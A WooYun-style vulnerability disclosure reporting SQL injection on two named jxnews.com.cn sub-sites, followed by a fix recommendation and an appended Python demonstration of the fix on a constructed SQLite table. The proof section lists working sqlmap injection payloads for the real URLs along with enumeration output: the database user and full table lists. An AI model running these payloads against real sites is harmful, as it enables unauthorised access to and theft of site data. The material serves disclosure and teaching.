
Vulnerability summary

Defect ID: wooyun-2013-045726

Title: Sensitive information disclosure # SQL injection in a Dajiang Net (大江网) sub-site

Vendor: jxnews.com.cn

Author: adm1n

Submitted: 2013-12-12 14:58

Fix time: 2013-12-17 14:59

Published: 2013-12-17 14:59

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-12-12: details sent to the vendor, awaiting vendor handling
2013-12-17: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection in Dajiang Net (大江网) sub-sites.

Detailed description:

Two injectable endpoints; the sqlmap output below is for the newsid parameter of the first one:

1.http://jbqgb.jxnews.com.cn/article.php?newsid=1883
2.http://dev.jxnews.com.cn/yw/ms/view.php?id=11970

Proof:

Place: GET
Parameter: newsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=1883 AND 4350=4350
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: newsid=1883 AND (SELECT 8006 FROM(SELECT COUNT(*),CONCAT(0x7175756271,(SELECT (CASE WHEN (8006=8006) THEN 1 ELSE 0 END)),0x7175696971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 35 columns
Payload: newsid=-6839 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7175756271,0x5446514b6f765145676b,0x7175696971),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: newsid=1883 AND SLEEP(5)
---
[13:57:06] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.3, PHP 5.3.6
back-end DBMS: MySQL 5.0
current user: 'jxrbcom@localhost'
Database: test
[1 table]
+-------------------------------+
| test |
+-------------------------------+
Database: jxrbcom
[90 tables]
+-------------------------------+
| acl |
| acl_sections |
| acl_seq |
| aco |
| aco_map |
| aco_sections |
| aco_sections_seq |
| aco_seq |
| aro |
| aro_groups |
| aro_groups_id_seq |
| aro_groups_map |
| aro_map |
| aro_sections |
| aro_sections_seq |
| aro_seq |
| axo |
| axo_groups |
| axo_groups_map |
| axo_map |
| axo_sections |
| axo_sections_seq |
| axo_seq |
| groups_aro_map |
| groups_axo_map |
| koobi4_active |
| koobi4_adminlogs |
| koobi4_affiliates |
| koobi4_areas |
| koobi4_articlecat |
| koobi4_articlecomments |
| koobi4_articles |
| koobi4_autowords |
| koobi4_container |
| koobi4_downloadcat |
| koobi4_downloadcat_restricted |
| koobi4_downloadcomments |
| koobi4_downloads |
| koobi4_f_allowed_files |
| koobi4_f_attachment |
| koobi4_f_category |
| koobi4_f_forum |
| koobi4_f_mods |
| koobi4_f_permissions |
| koobi4_f_post |
| koobi4_f_rank |
| koobi4_f_rating |
| koobi4_f_topic |
| koobi4_faq |
| koobi4_gallery |
| koobi4_gallery_items |
| koobi4_genres |
| koobi4_guestbook |
| koobi4_guestbook_settings |
| koobi4_ignore |
| koobi4_languages |
| koobi4_languages_admin |
| koobi4_linkcat |
| koobi4_linkcomments |
| koobi4_links |
| koobi4_manufacturer |
| koobi4_navi |
| koobi4_news |
| koobi4_newscat |
| koobi4_newscomments |
| koobi4_newsletter |
| koobi4_newsletter_abos |
| koobi4_newsletter_archiv |
| koobi4_permissions |
| koobi4_platform |
| koobi4_pn |
| koobi4_poll |
| koobi4_poll_item |
| koobi4_pollcomments |
| koobi4_posticons |
| koobi4_products |
| koobi4_referer |
| koobi4_securecode |
| koobi4_sessions |
| koobi4_settings |
| koobi4_sitestats |
| koobi4_smileys |
| koobi4_speedbar |
| koobi4_static |
| koobi4_static_categ |
| koobi4_user |
| koobi4_userfields |
| koobi4_usergroup |
| koobi4_useronline |
| phpgacl |
+-------------------------------+
Database: information_schema
[26 tables]
+-------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+-------------------------------+

Fix recommendation:

Filter the input: validate newsid and id as integers before use (intval() in PHP) and pass them to the database as bound parameters instead of concatenating them into the query string.
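Added example (editor's illustration, not code from the original report or from the jxnews.com.cn site): the boolean-based blind and UNION tests that sqlmap ran above, replayed against a constructed in-memory SQLite stand-in for the article lookup (the real back end was MySQL 5.0; SQLite, the table name `articles` and its two sample rows are assumptions). `vulnerable_lookup` concatenates the GET value into the query, which is the pattern behind the finding; `safe_lookup` binds it as a parameter, which is the fix.

```python
import sqlite3

# Constructed sample rows standing in for the real article table (assumption).
SAMPLE_ROWS = [
    (1883, "Sample article A"),
    (1884, "Sample article B"),
]


def make_db():
    """In-memory SQLite stand-in for the site's MySQL back end (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (newsid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, newsid):
    """The pattern behind the finding: the raw GET value is pasted into SQL,
    so 'AND 4350=4350' or 'UNION ALL SELECT ...' becomes part of the query."""
    sql = "SELECT newsid, title FROM articles WHERE newsid=" + newsid
    return conn.execute(sql).fetchall()


def safe_lookup(conn, newsid):
    """The fix: the value is bound as a parameter, so it is only ever data.
    An injected string compares as text against the integer column and
    matches nothing; add an int() check in front of this in real code."""
    return conn.execute(
        "SELECT newsid, title FROM articles WHERE newsid=?", (newsid,)
    ).fetchall()


def boolean_blind_check(lookup, base="1883"):
    """Replay the report's boolean-based blind test: the normal id, the id
    with an always-true condition, and the id with an always-false one.
    The parameter is injectable when the true case reproduces the normal
    response and the false case changes it."""
    conn = make_db()
    baseline = lookup(conn, base)
    resp_true = lookup(conn, base + " AND 4350=4350")
    resp_false = lookup(conn, base + " AND 4350=4351")
    return resp_true == baseline and resp_false != baseline


def union_probe(lookup):
    """Replay the report's UNION technique against a two-column query:
    a negative id empties the real result set, and the UNION row carries
    attacker-chosen data (here the database version) back in the page."""
    conn = make_db()
    return lookup(conn, "-6839 UNION ALL SELECT NULL, sqlite_version()")


if __name__ == "__main__":
    print("concatenated query injectable:", boolean_blind_check(vulnerable_lookup))
    print("parameterised query injectable:", boolean_blind_check(safe_lookup))
    print("union via concatenation:", union_probe(vulnerable_lookup))
    print("union via parameters:", union_probe(safe_lookup))
```

Run stand-alone, the concatenated lookup reports injectable and returns the database version through the UNION row, while the parameterised lookup reports not injectable and returns no rows for either payload. The same differential (true condition equals baseline, false condition differs) is what the "boolean-based blind" entry in the proof above was built on.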

Copyright notice: when reposting, cite the source: adm1n@WooYun (乌云)


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored)

Ignored at: 2013-12-17 14:59

Vendor reply:

Latest status:

None yet